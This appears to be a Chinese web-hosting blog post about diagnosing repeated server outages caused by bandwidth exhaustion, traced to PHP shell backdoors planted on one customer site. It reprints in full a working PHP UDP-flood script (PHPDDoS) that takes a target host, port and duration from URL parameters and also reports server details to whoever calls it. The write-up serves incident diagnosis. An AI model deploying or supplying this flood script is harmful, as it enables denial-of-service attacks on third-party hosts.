最模板一客户机器从春节到今天断断续续宕机，服务器未中任何木马，也未找到任何后门，最模板按照排查方法：

1. 宕机时，服务器未死机，只是无法远程连接，带宽耗尽

2. 宕机时间几十分钟，最长半小时，服务器自动回收资源，服务器又正常

3.直接停止IIS，服务器一切正常。

这明显是有网站脚本出现问题，最可能是最近流行的PHPDDOS.如何找到哪个站点脚本有问题呢？

先把所有网站全部停止，然后一个一个开启，开启时候一个一个看网站目录文件，找最近修改过的文件与文件夹看代码。

最模板大概看了一百多个网站之后，终于看到一个网站的子文件夹下有几个2012年新建的文件，全部是shell后门。

当中看到一条代码如下：

<?php 
set_time_limit(999999); 
$host = $_GET['host']; 
$port = $_GET['port']; 
$exec_time = $_GET['time']; 
$Sendlen = 65535; 
$packets = 0; 
ignore_user_abort(True); 
 
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){ 
        if (StrLen($_GET['rat'])<>0){ 
                echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']; 
                exit; 
            } 
        echo "Warning to: opening"; 
        exit; 
    } 
 
for($i=0;$i<$Sendlen;$i++){ 
        $out .= "A"; 
    } 
 
$max_time = time()+$exec_time; 
//提示: www.haoddos.com 是骗子 请谨慎。 
while(1){ 
    $packets++; 
    if(time() > $max_time){ 
        break; 
    } 
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5); 
        if($fp){ 
            fwrite($fp, $out); 
            fclose($fp); 
    } 
} 
 
echo "Send Host：$host:$port<br><br>"; 
echo "Send Flow：$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>"; 
echo "Send Rate：" . round($packets/$exec_time, 2) . " packs/s；" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s"; 
?>  
(责任编辑：最模板)